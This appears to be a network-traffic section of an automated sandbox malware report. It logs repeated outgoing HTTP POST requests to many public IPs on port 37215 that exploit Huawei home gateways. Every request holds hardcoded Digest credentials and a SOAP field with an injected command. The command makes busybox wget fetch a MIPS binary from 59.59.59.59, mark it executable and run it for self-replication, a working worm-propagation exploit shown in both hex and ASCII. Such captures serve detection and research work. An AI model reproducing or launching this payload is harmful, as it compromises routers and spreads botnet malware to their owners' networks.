                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          965192.168.2.154213441.42.39.12937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.720186949 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          966192.168.2.1536576159.147.80.13037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.720253944 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          967192.168.2.1551112157.104.45.13437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.720730066 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          968192.168.2.1558022197.199.151.22537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.720796108 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          969192.168.2.155011641.11.92.4237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.720916033 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          970192.168.2.1534640157.242.150.23337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.720999956 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          971192.168.2.153893041.104.169.4037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.721005917 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          972192.168.2.1546278157.53.49.23937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.721095085 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          973192.168.2.155979049.31.136.12637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.721609116 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          974192.168.2.1559828157.137.155.11737215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:56.721915960 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 